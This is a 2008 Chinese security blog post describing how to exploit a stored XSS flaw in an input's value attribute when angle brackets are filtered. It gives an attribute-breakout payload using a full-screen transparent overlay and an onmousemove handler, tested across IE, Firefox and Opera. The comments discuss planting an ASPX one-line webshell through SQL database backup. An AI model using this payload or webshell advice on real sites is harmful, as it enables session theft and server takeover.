Artificial Intelligence

Terminator:Skynet...010010001000010000010000100001000101010100101001010101001001010001001010000101001010101001010101010100101010100101001010100101001001010010100101100101010101011111010100101011101111

kj021320ID:kj021320
380213次访问,排名136好友0人,关注者24
kj021320的文章
原创 102 篇
翻译 1 篇
转载 25 篇
评论 116 篇
Terminator:Skynet的公告
ID: kj021320
Name: Skynet(AI)
QQ: 282720807
mail:kj021320@126.com
mail:kj021320@gmail.com
http://blog.csdn.net/I_S_T_O/
艾尔斯帝欧
最近评论
kj021320:兄弟~~ 看清楚点哇!
electroniXtar:-moz-binding 这东西怎么可能在IE上成功???
wangzijiankj:谢谢,学了很多,不知道这些资料可以去那里找找?感觉基本书上都不会讲这些吧
suddy:打酱油的路过

扭头叫一句:猥琐啊猥琐!!:)
余弦:学习了。:-)
文章分类
收藏
    相册
    程序截图
    我的茅舍
    装B的图片
    ISTO成员
    AMXSA's BLOG--PHP高手
    I.C.E'blog一位网络高手
    LIVING's BLOG
    MASK's BLOG--- ASP/Delphi
    SUMMER--搜索引擎开发者
    Security
    milw0rm
    red database security
    技术
    Ada Joint Program Office
    ADA Program Language
    ALL jar download
    BEA DOCUMENTS
    Caucho Technology
    codeproject
    CURL WEB Program language
    D language document
    Documentation at PDC
    Firebird Documentation
    Flex LiveDocs
    FreeBSD Document
    FreeMarker template engine
    hadoop分布式
    IBM informix文档中心
    IBM RedBooks Search
    InternetEngineeringTaskForce
    jakarta-apache.LOG4J
    jcaptcha
    LINUX Documentation
    MIT's OpenCourseWare
    MSDN WEBCAST
    MySQL Reference Manual
    nokia sdk document
    novell-documentation
    ORACLE documentation
    Perl Documentation
    PHP.net Document
    planet-source-code
    PostgreSql Document
    Python Documentation
    reflector
    SapDB documentation
    SourceForge
    SQLite cn
    Sybase Online Document
    teradata Resources
    Velocity Java template engine
    WebWork - Documentation
    Web标准组织
    看雪学院
    美国基因组研究所
    友情连接
    ADK成员-C#
    K' 同学的BLOG
    NetMiner's BLOG
    rainnyzhong--ORACLE
    一个忘不了的好友,我的领路人
    忍者's BLOG
    精灵
    黑客榜中榜
    存档
    软件项目交易
    订阅我的博客
    XML聚合  FeedSky
    订阅到鲜果
    订阅到Google
    订阅到抓虾
    订阅到BlogLines
    订阅到Yahoo
    订阅到GouGou
    订阅到飞鸽
    订阅到Rojo
    订阅到newsgator
    订阅到netvibes

    原创 关于属性中没有对双引号转义的XSS方式 FF IE Opera通杀收藏

    新一篇: 通过getelement定位XSS SHELLCODE | 旧一篇: 使用newrbe 神经网络模拟sin逼近II

     
       
    某网站存在一个 storeXSS  利用点如下
    <input type=text value="[xsscode]">
    可以使用 双引号绕过去属性限制,但是不能采用 < > 比较郁闷
    开始打算 
    "style="kj:expression(EXP)
    <input type=text value=""style="kj:expression(EXP)">
    后来查了查资料!发现expression是IE 才能使用的!郁闷了!
    而且要XSS的对象是老外 ,不一定会采用IE ,这样跨站攻击起来了,但是效果会大打折扣。
    想想还是添加事件吧!但是,怎么触发这个事件呢!?   无奈之下让我想到恶心的利用方式,
    采用style 进行绝对定位 然后透明效果 覆盖全屏幕,最后加入onmousemove事件

    <input name="kj" value="kj021320" style="position:absolute;z-index:0;top:0px;width:100%; height:100%;left:0px;filter:alpha(opacity=0);-moz-opacity:0.0;opacity:0.0;" onmousemove="if(!window.k){alert(this.style.height=0);window.k=123;}">

    最后测试了一下!结果IE FF2 FF3 都OK,另外令我惊喜的是 居然opera都通杀!
    这个效果不错!哈!来先做个俯卧撑

    发表于 @ 2008年07月20日 10:57:00|评论(loading...)|收藏

    新一篇: 通过getelement定位XSS SHELLCODE | 旧一篇: 使用newrbe 神经网络模拟sin逼近II

    评论

    #KOK 发表于2008-07-20 12:01:51  IP: 220.172.180.*
    我来打酱油的
    #fayewongzx 发表于2008-07-20 18:29:25  IP: 222.130.58.*
    请问一下
    你的aspx一句话木马
    通过sql数据库备份的方法
    会造成这个语句多次重复
    导致不能使用
    怎么办?
    #kj 发表于2008-07-21 15:21:45  IP: 121.0.31.*
    用别的一句话 request file save那种
    #mickey 发表于2008-07-21 18:01:41  IP: 221.218.194.*
    好厉害..
    我好崇拜你哦.你做俯卧撑的姿势好帅,帅哥.
    :-)
    #fayewongzx 发表于2008-07-23 12:24:43  IP: 222.130.45.*
    关于aspx一句话木马
    通过sql数据库备份的方法
    会造成这个语句多次重复


    这个问题

    你在说清楚一点

    request file save


    是什么?
    #suddy 发表于2008-07-27 08:03:47  IP: 125.120.82.*
    打酱油的路过

    扭头叫一句:猥琐啊猥琐!!:)
    发表评论  


    登录
    Csdn Blog version 3.1a
    Copyright © Terminator:Skynet